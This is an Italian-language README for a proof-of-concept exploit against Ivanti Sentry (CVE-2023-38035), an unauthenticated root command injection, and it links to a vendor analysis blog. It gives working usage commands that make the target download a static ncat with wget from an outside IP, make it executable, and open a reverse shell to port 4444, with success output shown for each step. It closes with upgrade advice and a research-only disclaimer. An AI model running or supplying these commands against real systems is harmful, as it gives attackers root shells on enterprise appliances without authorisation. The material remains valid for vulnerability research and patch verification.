
Exploit proof-of-concept per CVE-2023-38035, un'iniezione di comandi non autenticata in Ivanti Sentry che consente l'esecuzione arbitraria di comandi root e una shell inversa tramite ncat.
POC per CVE-2023-38035 che colpisce Ivanti Sentry
Un'analisi tecnica della causa principale della vulnerabilità è disponibile sul nostro blog: https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive
Questo POC sfrutta un'iniezione di comandi non autenticata per eseguire comandi arbitrari come utente root.
Il contesto di esecuzione non consente il piping dei comandi e il sistema non fornisce binari facilmente sfruttabili, quindi i comandi possono essere concatenati per scaricare un ncat statico da qualche parte come https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/ncat.
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'wget http://123.123.123.123:8000/ncat -O /tmp/ncat'
[+] Successfully executed command on target!
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'chmod +x /tmp/ncat'
[+] Successfully executed command on target!
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'sudo /tmp/ncat 123.123.123.123 4444 -e /bin/sh'
[+] Successfully executed command on target!

Aggiornare all'ultima versione secondo le istruzioni contenute nell'avviso Ivanti
Questo software è stato creato puramente a scopo di ricerca accademica e per lo sviluppo di tecniche difensive efficaci, e non è destinato a essere utilizzato per attaccare sistemi se non espressamente autorizzato. I manutentori del progetto non sono responsabili per un uso improprio del software. Usalo in modo responsabile.